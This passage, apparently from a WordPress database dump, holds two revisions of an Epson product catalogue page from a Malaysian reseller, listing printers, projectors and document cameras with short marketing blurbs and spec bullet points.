compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Print speed up to 35ppm</li>\n 	<li>Auto-Duplex</li>\n 	<li>Ethernet &amp; Epson iPrint</li>\n 	<li>2 optional paper cassette tray</li>\n</ul>[maxbutton id=\"12\" ]<h4><strong>Epson WorkForce AL-M8100DNÂ </strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M8100DN-.png\" alt=\"\" width=\"256\" height=\"144\" /><br><br>\nUnleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Print speed up to 40 ppm</li>\n 	<li>Epson iPrint</li>\n 	<li>Ethernet</li>\n 	<li>4 optional cassette trays</li>\n</ul>[maxbutton id=\"12\" ]		\n			<h2>POS PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson TM-H6000IVÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-H6000IV.png\" alt=\"\" width=\"224\" height=\"125\" /></p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.</p><ul><li>Thermal &amp; Dot Output</li><li>Speed: Up to 300mm/sec</li><li>Check printing</li><li>Bi-directional printing</li><li>SupportsÂ slip printing, validation and endorsement print</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson TM-T88V-iÂ </strong>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T88V-i.png\" alt=\"\" width=\"243\" height=\"137\" /></h4>\nCreate a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.\n<ul>\n 	<li>Printing speed of up to 300mm/second</li>\n 	<li>20 million lines for printer mechanism</li>\n 	<li>Up to 2 million for auto-cutter</li>\n 	<li>LAN, Serial, USB 2.0 (Type A) x 4</li>\n 	<li>Control peripherals easily</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson TM-T70IIÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T70II.png\" alt=\"\" width=\"254\" height=\"143\" /><br /><br /></h4><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.</p><ul><li>Print method: Thermal line printing</li><li>Width: 79Â Â±Â 0.5 mm</li><li>Print Speed: Up to 250 mm/ sec</li><li>Auto-cutter feature</li></ul><center>[maxbutton id=\"12\" ]</center>		\n			<h2>PHOTO PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson L1800 A3 Photo Ink Tank Printer</strong></h4><p><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L1800-Printer.png\" alt=\"\" width=\"241\" height=\"175\" /></p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.</p><ul><li>Yield of up to 1,500 4R photos</li><li>Print speed up to 15ppm</li><li>High-yield ink bottles</li><li>1-year warranty or 9,000 prints</li></ul>		\n		[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson L850 PrinterÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L850-Printer.png\" alt=\"\" width=\"261\" height=\"147\" /></p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.</p><ul><li>High-yield ink bottles</li><li>2.7 colour LCD screen</li><li>Direct printing via memory card slot, USB port and PictBridge</li><li>CD/DVD printing</li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson L805 PrinterÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L805-Printer-.png\" alt=\"\" width=\"240\" height=\"135\" /></h4><p><br />The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.</p><ul><li>Yield of Up to 1,800 4R photos</li><li>Lowest Printing Costs</li><li>Wi-Fi &amp; Epson iPrint</li><li>CD/DVD Printing Capability</li><li>1 year or 3,000 prints warranty</li></ul>[maxbutton id=\"12\" ]		\n			<h2>Projectors for Work</h2>		\n			<h2>CORPORATE AND EDUCATIONÂ </h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EB-2055</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2055.png\" alt=\"\" width=\"245\" height=\"163\" /></p><p>Leave the lights on and take control whether in the meeting room or classroom. Epsonâ€™s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.</p><ul><li>XGA Resolution</li><li>White and Colour Light Output at 5,000 lumens</li><li>Gesture Presenter</li><li>Multi-PC Projection</li><li>2 x HDMI</li><li>Split Screen</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson EB-2142W</strong>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2142W.jpg\" alt=\"\" width=\"245\" height=\"138\" /></h4>\nEnjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.\n<ul>\n 	<li>White and Colour Brightness at 4,200lm</li>\n 	<li>WXGA Resolution</li>\n 	<li>12000 hours lamp life in eco-mode</li>\n 	<li>MHL-enabled</li>\n 	<li>Multi-PC Projection</li>\n 	<li>Horizontal Keystone Slider</li>\n 	<li>Miracast<sup>Â®</sup></li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>\n<h4 style=\"text-align: center;\"><strong>Epson EB-L500WÂ </strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-L500W.jpg\" alt=\"\" width=\"251\" height=\"142\" />\nThe compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.\n<ul>\n 	<li>5,000 lumens colour/white brightness<sup>Â </sup></li>\n 	<li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio</li>\n 	<li>Laser light source of up to 20,000 hours</li>\n 	<li>Virtually maintenance-free for optical engine life</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>ACCENT LIGHTING LASER PROJECTORS</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson LightScene EV-105</strong><br /><br /></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-LightScene-EV-105.jpg\" alt=\"\" width=\"263\" height=\"176\" /></p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and dÃ©cor applications. Designed to blend in discreetly to any setting â€” from retail, hospitality and event spaces to showrooms and museums â€” LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.</p><ul><li>Laser projector for digital art and signage</li><li>Seamlessly blends into virtually any environment</li><li>Up to 20,000 hours of virtually maintenance-free operation</li><li>360-degree mounting: floors, walls or ceilings</li><li>Remote management and control tools</li><li>Best New Award Overall</li></ul><center>[maxbutton id=\"12\" ]</center>		\n			<h2>ULTRA PORTABLE</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EB-1785WÂ </strong></h4><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-1785W.png\" alt=\"\" width=\"236\" height=\"133\" /><br>\nThe Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.\n<ul>\n 	<li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens</li>\n 	<li>WXGA Resolution</li>\n 	<li>Real-Time Auto Keystone Correction</li>\n 	<li>Split Screen Projection</li>\n 	<li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center<		\n			<h3>INTERACTIVE</h3>		\n		<p><strong>Epson EB-536WiÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-536Wi.png\" alt=\"\" width=\"242\" height=\"136\" /></p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.</p><ul><li>White and Colour Brightness at 3,400lm</li><li>WXGA Resolution</li><li>Multi-PC projection</li><li>HDMI Connectivity</li><li>Pen Interactivity</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson 595Wi/585Wi/575Wi</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-595Wi.png\" alt=\"\" width=\"276\" height=\"155\" /></p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.</p><ul><li>WXGA Resolution</li><li>White and Colour Brightness at 3,300lm</li><li>Multi-PC projection</li><li>HDMI Connectivity x2</li></ul>[maxbutton id=\"12\" ]		\n			<h3>HIGH BRIGHTNESS</h3>		\n		<p><strong>Epson EB-L1405UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/EB-L1405UNL.png\" alt=\"\" width=\"207\" height=\"117\" /></p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000Â long lasting hours maintenance-free.</p><ul><li>White and Colour Brightness at 8,000lm</li><li>WUXGA (1920 x 1200)</li><li>Edge-blending to create large panoramic images</li><li>Curve and corner wall projection</li><li>HDBaseT</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-G7400UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-G7400UNL.png\" alt=\"\" width=\"205\" height=\"116\" /></p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fineâ„¢ and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projectorâ€™s astoundingly short throw ratio of 0.35*.</p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.</em></p><ul><li>High Brightness</li><li>Beyond Full HD Resolution</li><li>Powered Lens</li><li>Portrait Projection</li><li>Flexible Installation</li><li>Edge Blending</li><li>Point Correction</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-Z10000UÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-Z10000U.png\" alt=\"\" width=\"208\" height=\"117\" /></p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.</p><ul><li>White and Colour Brightness at 10,000Â lm</li><li>WUXGA resolution</li><li>High Reliability and Durability</li><li>Suitable for 24/7 usage</li><li>Flexible projection angles and installations</li></ul>[maxbutton id=\"12\" ]<h3>DOCUMENT CAMERAS</h3><p><strong>Document Camera ELPDC21Â </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Document-Camera-ELPDC21.jpg\" alt=\"\" width=\"206\" height=\"137\" /></p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.</p><ul><li>Pixels: 2MP (1920 x 1080 pixels)</li><li>Camera Sensor: 1/2.7 inch CMOS Sensor</li><li>Resolution: Up to Full HD (1080p)</li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom</li><li>Weight: Approx 3.0kg</li></ul><p>[maxbutton id=\"12\" ]</p>','Epson','','inherit','closed','closed','','1486-revision-v1','','','2019-09-26 10:42:03','2019-09-26 02:42:03','',1486,'https://bintara.com.my/blog/2019/09/26/1486-revision-v1/',0,'revision','',0),(3489,1,'2019-09-26 10:44:02','2019-09-26 02:44:02','<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.</p><h2>Printers for Work</h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.</p>		\n			<h2>BUSINESS INKJET PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson WorkForce Enterprise WF-C17590Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Enterprise-WF-C17590.jpg\" alt=\"\" width=\"366\" height=\"207\" /></p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCoreâ„¢, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.</p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax</li><li>Ink: DURABrite<sup>TM</sup>Â Pro pigment ink cartridges</li><li>ISO Print Speed: 75 ISO ppm (black/colour) simplex/duplex</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce Pro WF-C5290Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Pro-WF-C5290.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.</p><ul><li>High yield ink packs</li><li>High-speed auto-duplex printing</li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li><li>Epson Connect</li><li>EnergyÂ saving</li></ul><h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-100Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-100.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.</p><ul><li>Print speed up to 14 ppm</li><li>Epson Connect</li><li>1.44 Colour LCD Panel</li><li>Wi-Fi and Wi-Fi Direct connectivity</li><li>Built-in battery</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-7711</strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-7711.png\" alt=\"\" width=\"304\" height=\"172\" /><br>\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM</sup>Â technology, fast printing speed consistently delivers success in every detail.\n<ul>\n 	<li>Print speeds up to 18ipm for black and 10ipm for colour</li>\n 	<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li>\n 	<li>Duplex printing up to A3 size</li>\n 	<li>Epson DURABrite<sup>TM</sup>Â Ultra ink</li>\n 	<li>4.3â€ Colour LCD Touch Panel</li>\n 	<li>Print, Scan, Copy Fax with ADF</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>INK TANK SYSTEM</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EcoTank L3150</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EcoTank-L3150-.jpg\" alt=\"\" width=\"311\" height=\"175\" /></p><p>Save more with Epsonâ€™s economical and multifunctional printing solutions for businessâ€”the EcoTank L3150â€”built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.</p><ul><li>Compact integrated tank design</li><li>High yield ink bottles</li><li>Spill-free, error-free refilling</li><li>Wi-Fi, Wi-Fi Direct</li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)</li><li>Borderless printing up to 4R</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson L120 PrinterÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L120-Printer.png\" alt=\"\" width=\"301\" height=\"170\" /></h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.</p><ul><li>High-yield ink bottles</li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color</li><li>Compact Size</li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first</li></ul>		\n		[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson M1100 Printer</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-M1100-Printer-.png\" alt=\"\" width=\"315\" height=\"178\" /></p><p>EfficiencyÂ meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pagesÂ each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.</p><ul><li>Compact integrated tank design</li><li>High-yield pigment ink bottle</li><li>Spill-free, error-free refilling</li><li>Print speed up to 32ppm (15ipm)</li><li>4 years warranty</li></ul>		\n		<center>[maxbutton id=\"12\" ]</center>		\n			<h2>LASER PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson AcuLaser C9300N</strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-AcuLaser-C9300N.png\" alt=\"\" width=\"313\" height=\"177\" /><br>\nThe Epson AcuLaserâ„¢ C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Speed: Up to 30ppm</li>\n 	<li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)</li>\n 	<li>Quality prints with new Epson Technologies</li>\n 	<li>New print job management features</li>\n</ul>[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\">Â <strong>Epson WorkForce AL-M320DNÂ </strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M320DN-.jpg\" alt=\"\" width=\"254\" height=\"296\" /><br>\nThe Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Print speed up to 35ppm</li>\n 	<li>Auto-Duplex</li>\n 	<li>Ethernet &amp; Epson iPrint</li>\n 	<li>2 optional paper cassette tray</li>\n</ul>[maxbutton id=\"12\" ]<h4><strong>Epson WorkForce AL-M8100DNÂ </strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M8100DN-.png\" alt=\"\" width=\"256\" height=\"144\" /><br><br>\nUnleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Print speed up to 40 ppm</li>\n 	<li>Epson iPrint</li>\n 	<li>Ethernet</li>\n 	<li>4 optional cassette trays</li>\n</ul>[maxbutton id=\"12\" ]		\n			<h2>POS PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson TM-H6000IVÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-H6000IV.png\" alt=\"\" width=\"224\" height=\"125\" /></p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.</p><ul><li>Thermal &amp; Dot Output</li><li>Speed: Up to 300mm/sec</li><li>Check printing</li><li>Bi-directional printing</li><li>SupportsÂ slip printing, validation and endorsement print</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson TM-T88V-iÂ </strong>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T88V-i.png\" alt=\"\" width=\"243\" height=\"137\" /></h4>\nCreate a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.\n<ul>\n 	<li>Printing speed of up to 300mm/second</li>\n 	<li>20 million lines for printer mechanism</li>\n 	<li>Up to 2 million for auto-cutter</li>\n 	<li>LAN, Serial, USB 2.0 (Type A) x 4</li>\n 	<li>Control peripherals easily</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson TM-T70IIÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T70II.png\" alt=\"\" width=\"254\" height=\"143\" /><br /><br /></h4><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.</p><ul><li>Print method: Thermal line printing</li><li>Width: 79Â Â±Â 0.5 mm</li><li>Print Speed: Up to 250 mm/ sec</li><li>Auto-cutter feature</li></ul><center>[maxbutton id=\"12\" ]</center>		\n			<h2>PHOTO PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson L1800 A3 Photo Ink Tank Printer</strong></h4><p><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L1800-Printer.png\" alt=\"\" width=\"241\" height=\"175\" /></p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.</p><ul><li>Yield of up to 1,500 4R photos</li><li>Print speed up to 15ppm</li><li>High-yield ink bottles</li><li>1-year warranty or 9,000 prints</li></ul>		\n		[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson L850 PrinterÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L850-Printer.png\" alt=\"\" width=\"261\" height=\"147\" /></p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.</p><ul><li>High-yield ink bottles</li><li>2.7 colour LCD screen</li><li>Direct printing via memory card slot, USB port and PictBridge</li><li>CD/DVD printing</li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson L805 PrinterÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L805-Printer-.png\" alt=\"\" width=\"240\" height=\"135\" /></h4><p><br />The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.</p><ul><li>Yield of Up to 1,800 4R photos</li><li>Lowest Printing Costs</li><li>Wi-Fi &amp; Epson iPrint</li><li>CD/DVD Printing Capability</li><li>1 year or 3,000 prints warranty</li></ul>[maxbutton id=\"12\" ]		\n			<h2>Projectors for Work</h2>		\n			<h2>CORPORATE AND EDUCATIONÂ </h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EB-2055</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2055.png\" alt=\"\" width=\"245\" height=\"163\" /></p><p>Leave the lights on and take control whether in the meeting room or classroom. Epsonâ€™s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.</p><ul><li>XGA Resolution</li><li>White and Colour Light Output at 5,000 lumens</li><li>Gesture Presenter</li><li>Multi-PC Projection</li><li>2 x HDMI</li><li>Split Screen</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson EB-2142W</strong>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2142W.jpg\" alt=\"\" width=\"245\" height=\"138\" /></h4>\nEnjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.\n<ul>\n 	<li>White and Colour Brightness at 4,200lm</li>\n 	<li>WXGA Resolution</li>\n 	<li>12000 hours lamp life in eco-mode</li>\n 	<li>MHL-enabled</li>\n 	<li>Multi-PC Projection</li>\n 	<li>Horizontal Keystone Slider</li>\n 	<li>Miracast<sup>Â®</sup></li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>\n<h4 style=\"text-align: center;\"><strong>Epson EB-L500WÂ </strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-L500W.jpg\" alt=\"\" width=\"251\" height=\"142\" />\nThe compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.\n<ul>\n 	<li>5,000 lumens colour/white brightness<sup>Â </sup></li>\n 	<li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio</li>\n 	<li>Laser light source of up to 20,000 hours</li>\n 	<li>Virtually maintenance-free for optical engine life</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>ACCENT LIGHTING LASER PROJECTORS</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson LightScene EV-105</strong><br /><br /></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-LightScene-EV-105.jpg\" alt=\"\" width=\"263\" height=\"176\" /></p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and dÃ©cor applications. Designed to blend in discreetly to any setting â€” from retail, hospitality and event spaces to showrooms and museums â€” LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.</p><ul><li>Laser projector for digital art and signage</li><li>Seamlessly blends into virtually any environment</li><li>Up to 20,000 hours of virtually maintenance-free operation</li><li>360-degree mounting: floors, walls or ceilings</li><li>Remote management and control tools</li><li>Best New Award Overall</li></ul><center>[maxbutton id=\"12\" ]</center>		\n			<h2>ULTRA PORTABLE</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EB-1785WÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-1785W.png\" alt=\"\" width=\"238\" height=\"177\" /></p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.</p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens</li><li>WXGA Resolution</li><li>Real-Time Auto Keystone Correction</li><li>Split Screen Projection</li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection</li></ul><center>[maxbutton id=\"12\" ]&lt;/center&lt;</center>		\n			<h3>INTERACTIVE</h3>		\n		<p><strong>Epson EB-536WiÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-536Wi.png\" alt=\"\" width=\"242\" height=\"136\" /></p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi 